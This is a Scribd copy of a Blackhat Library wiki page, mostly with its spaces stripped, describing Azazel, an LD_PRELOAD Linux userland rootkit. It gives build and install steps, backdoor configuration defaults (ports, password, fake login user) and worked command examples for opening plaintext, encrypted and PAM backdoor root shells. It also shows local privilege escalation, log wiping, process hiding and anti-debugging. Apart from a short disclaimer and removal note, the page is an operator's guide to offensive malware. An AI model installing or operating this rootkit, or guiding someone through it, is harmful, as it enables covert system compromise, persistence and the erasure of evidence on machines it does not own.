Scribd
Upload
216 views6 pages

Azazel

Azazel is a Linux userland rootkit written in C that uses LD_PRELOAD technique to hook system calls and hide its presence. It features log cleaning, process hiding, anti-debugging techniques, and includes both plaintext and encrypted backdoors to provide remote interactive shells. The rootkit focuses on evading detection tools like lsof, ps and unhide through techniques like selectively not hooking those programs and obfuscating strings.

Uploaded by

OmongoleJimJohnson
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
216 views6 pages

Azazel

Azazel is a Linux userland rootkit written in C that uses LD_PRELOAD technique to hook system calls and hide its presence. It features log cleaning, process hiding, anti-debugging techniques, and includes both plaintext and encrypted backdoors to provide remote interactive shells. The rootkit focuses on evading detection tools like lsof, ps and unhide through techniques like selectively not hooking those programs and obfuscating strings.

Uploaded by

OmongoleJimJohnson
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

Tweet

Azazel
FromSecurity101BlackhatTechniquesHackingTutorialsVulnerabilityResearchSecurityTools
AzazelisauserlandrootkitwritteninCbasedoffoftheoriginalLD_PRELOADtechniquefromJynxrootkit.Itis
morerobustandhasadditionalfeatures,andfocusesheavilyaroundantidebuggingandantidetection.Features
includelogcleaning,pcapsubversion,andmore.
Contents
1Disclaimer
2Features
3LatestSource
4HookingMethods
5Configuration
6BackdoorExamples
6.1Plaintextbackdoor
6.2Crypthookbackdoor
6.3PAMbackdoor
7LogClearing
8AntiDebugging
9ProcessHiding
10Preliminaryldd/unhideobfuscation
11Removal
12Related
Disclaimer
Itisacrimetousetechniquesortoolsonthispageagainstanysystemwithoutwritten
authorizationunlessthesysteminquestionbelongstoyou
Features
Antidebugging
Avoidsunhide,lsof,ps,ldddetection
Hidesfilesanddirectories
Hidesremoteconnections
Hidesprocesses
Hideslogins
PCAPhooksavoidlocalsniffing
TwoacceptbackdoorswithfullPTYshells.
Crypthookencryptedaccept()backdoor
Plaintextaccept()backdoor
PAMbackdoorforlocalprivescandremoteentry
Logcleanupforutmp/wtmpentriesbasedonpty
Usesxortoobfuscatestaticstrings
LatestSource
Clonethesources
Terminal
localhost:~$gitclonehttps://github.com/chokepoint/azazel.git
Buildtherootkit
Terminal
localhost:~$make
Running"makeinstall"willinjectthelivekitintoyoursystem.Whileremovalisnot
impossible,it'sanunnecessaryandpainfulprocedure,nottomentionyoumayforgetto
removeit.
HookingMethods
AzazelutilizesthesamehookingmethodsasJynx/Jynx2.Youcanhookindividualprogramsatthetimeof
executionbytakingadvantageoftheLD_PRELOADvariable.Bydefault,Azazelinstallsitselfaslibselinux.so
into/lib.Anentryisthenaddedto/etc/ld.so.preloadinordertohooksystemwidedynamicallycompiledprograms.
Exampleruntimehookingofbash.
Terminal
localhost:~$LD_PRELOAD=/lib/libselinux.sobashl
Insteadofdlsym'ingdirectlibcfunctionsbygloballydeclaringold_syscall,Azazelhasanewstructureinazazel.h
namedsyscall_list.Thisallowsalloftherequiredfunctionstobelinkeduponinitiationofthelibrary.Syscall
functionnamesareXORedbyconfig.pyandwrittentoconst.h.Originallibcfunctionscanbeaccessedbyusing
thepreprocessordefinitionsalsoinconst.h.EachdefinitionhasaprefixofSYS_name_of_function_in_caps.For
exampletocalllibc'sversionoffopen,youwouldusesyscalls[SYS_FOPEN].syscall_func()
typedef struct struct_syscalls {
char syscall_name[51];
void *(*syscall_func)();
} s_syscalls;
Configuration
Allvariablesthatrequirechangingpriortodeploymentarelocatednearthetopofconfig.py.Variabledatais
cipheredusinganXORkeyinordertonotexposethemtodumpingprogramslike"strings."Seebelowforalistof
variablesandtheirassociatedpurpose.
TherootkitwillhideallTCP/IPconnectionswithintheseHIGHandLOWportranges.
Theserangesareusedtonotonlyhidefromnetstat/lsof,butalsotohidefromsniffingusing
libpcap.
Numeric
Variable(s) Description Default
LOW_PORT/
HIGH_PORT
PortsusedtotriggerfullPTYplaintextbackdoor. 6104061050
CRYPT_LOW/
CRYPT_HIGH
PortsusedtotriggerfullPTYcrypthookbackdoor. 6105161060
PAM_PORT Alsohidesthisportbutdoesn'ttriggeracceptbackdoor. 61061
SHELL_MSG Displaythisstringtousersoncetheygetashell Welcome
SHELL_PASSWD Shellpasswordforbothplaintextandcrypthookbackdoors changeme
SHELL_TYPE Usethisshellforaccept()backdoors. /bin/bash
MAGIC_STRING Hideanyfileswiththisstringinthefilename. __
BLIND_LOGIN FakeuseraccountusedtoactivatethePAMbackdoor. rootme
ANTI_DEBUG_MSG Displaythismessagetothesysadminiftheytrytoptrace
Don'tscratchthe
walls.
CLEANUP_LOGS
Ifthisenvironmentvarissettoavalidpts,thencleanup
utmp/wtmplogsforthatpts.
CLEANUP_LOGS
Thefollowingvariablesarespecificallyincludedforthecrypthookbackdoor.
Numeric
Variable(s) Description Default
PASSPHRASE Thiskeyisusedforencryption/decryptionofsessions HelloNSA
KEY_SALT Keysaltusedforkeyderivation. changeme
BackdoorExamples
Foreachoftheseexamplesweareassumingthatsshdishookedwithazazelandabletotriggeranyofthethree
operationalbackdoors.
Plaintextbackdoor
WeneedtosetthelocalporttosomethingwithintherangesofLOW_PORTandHIGH_PORTasconfigured
above.Thisnotonlyensuresthattheconnectionwillbehiddenfromlocalsniffinganddetection,butitalsotriggers
afullPTYinteractiveshelluponenteringthecorrectpassword.Thelocalportcanbesetusingncat'spoption.
Uponsuccessfulyconnectingtotheremotedaemon,thefirstlineyouentershouldbetheSHELL_PASSWDthat
youcreated.
$ ncat target 22 -p 61040
changeme
Welcome!
Here's a shell.
root@host:/root #
Crypthookbackdoor
TriggeringtheCrypthookbackdoorissimilartotheplaintextbackdoor,butweneedtospeakthesameprotocol.
CrypthookisanAESencryptionwrapperforTCP/UDPconnectionsandcanbedownloadedfromhere.The
Crypthookreliesonpreloadhookingaswell,andcanbeusedwithnetcatbyutilizingLD_PRELOAD
environmentvariable.
$ LD_PRELOAD=./crypthook.so ncat localhost 22 -p 61051
changeme
Welcome!
Here's a shell.
root@host:/root/ #
PAMbackdoor
ThePAMhooksworkbywaitingforthespecifiedfakeusertoattemptaconnection.Thehooksreturnthepw
entryforrootandacceptanypasswordtoestablishasuccessfullogin.Sincethismethodwouldgenerallybeused
withsshd,theconnectionwillnotbehiddenunlessyoucanforcesshclienttobindtoalocalportwithinoneofthe
portranges.Anotherclientsharedlibraryhasbeenincludedtoforceaprogramtobindtoaportthatwe'dliketo
hide.
$ make client
$ LD_PRELOAD=./client.so ssh rootme@localhost
root@host:/ #
ThePAMhookscanalsobeusedforlocalprivesc.
$ su - rootme
#
LogClearing
Logclearingcanbeaccomplishedbysettingtheenvironmentvariabletothetty/ptsdevicethatyouwanttoremove
fromtherecordsandthenexecutingacommand.Whenaccessingthetargetsystemusingeitheroftheaccept
backdoors,thegivenpseudoterminalisautomaticallyremovedfrombothutmpandwtmplogfiles.However,ifyou
needtousethePAMbackdoorthroughSSH,youwillneedtomanuallyremoveyourptsfromthelogsas
demonstratedbelow.
$ w | grep pts/16
root pts/16 :0.0 Wed16 2:33m 0.16s 0.16s bash
$ CLEANUP_LOGS="pts/16" ls
utmp logs cleaned up.
wtmp logs cleaned up.
$ w | grep pts/16
$
AntiDebugging
Azazelhooksptrace()andreturns1,hencedenyinganydebuggingfromoccuring.Themessagedisplayedtothe
sysadminisreallymoreofajokethananythingandwilldefinitelysetoffalarmsthatsomethingiswrong.
$ strace -p $PPID
Don't scratch the walls
Thisworksonanyuserlanddebugger(ltrace,strace,gdb,ftrace).Thishookcouldbeeasilyextendedtohide
specificinformationshouldyoudesiretodoso.
ProcessHiding
Jynx/Jynx2reliedonaspecifiedGIDinordertohideprocessesandfiles.Therearesomeobviousproblemswith
usingthismethod,soAzazeladdressesthisbyagainusingenvironmentvariablestomaskanyprocessesthatmay
giveawayourpresence.Thevariablecanalsobeconfiguredinsideofconfig.py,butdefaultsto
HIDE_THIS_SHELL.
$ env HIDE_THIS_SHELL=plz ncat -l -p 61061
Whenthisenvironmentvariableisset,theprocessisabletoseefilesandprocesseshiddenbytherootkit.Thisis
importantforthePAMhook.BecausePAMinvokesbashonitsown,youhavetousethisenvironmentvariableto
accesshiddenfiles.
Tweet
Preliminaryldd/unhideobfuscation
AzazelavoidsdetectionfromlddandunhidebyselectivelyNOThookingthosetwoprograms.Oncetheprograms
aredone,azazelcontinueshookingprogramsasnormal.Thisopensupawindowforremovingtheoffending
library,butatthispointitisbetterthancompletelyrevealingthekit.Thenextreleasewillincludeamoreadvanced
antidebug/ldd/unhideobfuscation.
Removal
ToremoveAzazel,thebestcourseofactionistobootintoalivecd,mountyourbootableharddrive,anddeletethe
/etc/ld_preload.sofilefromthepartition.
Related
Linux
LD_PRELOAD
C
CryptHook(http://www.chokepoint.net/2013/09/crypthooksecuretcpudpconnection.html)
Jynx
HookingPAM
Retrievedfrom"http://www.blackhatlibrary.net/Azazel"
Thispagewaslastmodifiedon14February2014,at02:34.

You might also like